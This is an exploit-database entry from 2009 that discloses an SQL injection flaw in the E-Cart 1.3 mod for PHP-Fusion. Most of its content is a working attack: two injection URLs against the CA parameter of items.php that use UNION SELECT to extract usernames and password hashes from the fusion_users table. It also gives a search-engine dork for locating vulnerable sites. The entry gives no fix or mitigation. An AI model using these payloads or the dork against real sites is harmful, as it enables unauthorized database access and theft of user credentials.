id: 4620
date: 01/07/2009
title: PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability
author: IRCRASH
cves: 

====================================================================
PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability
====================================================================


#####################################################################################
####                    PHP-Fusion Mod E-Cart Sql Injection                      ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
#                                                                                   #
#Dork : inurl:/infusions/e_cart                                                     #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
#                                                                                   #
#Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-23]  #